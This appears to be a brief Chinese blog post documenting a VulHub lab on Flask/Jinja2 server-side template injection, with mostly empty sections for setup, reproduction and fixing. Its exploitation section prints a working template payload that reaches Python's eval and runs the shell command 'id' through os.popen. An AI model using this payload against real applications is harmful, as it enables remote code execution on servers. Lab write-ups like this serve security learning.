Flask - SSTI - VulHub

一、环境准备

启动docker环境 docker-compose up -d

如图

二、漏洞复现

我们先了解一下ssti模板注入，

可以尝试让 ai给我们生成一些payload

然后我们来看看题目

name为用户输入字段，随意输入进行验证，

三、修复

四、漏洞利用：

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

参考

https://www.cnblogs.com/3cH0-Nu1L/p/14607942.html

posted @ 2023-10-04 14:18 cc0vc 阅读(61) 评论(0) 收藏举报

刷新页面返回顶部

khxzz

Flask - SSTI - VulHub

一、环境准备

二、漏洞复现

三、修复

四、漏洞利用：

公告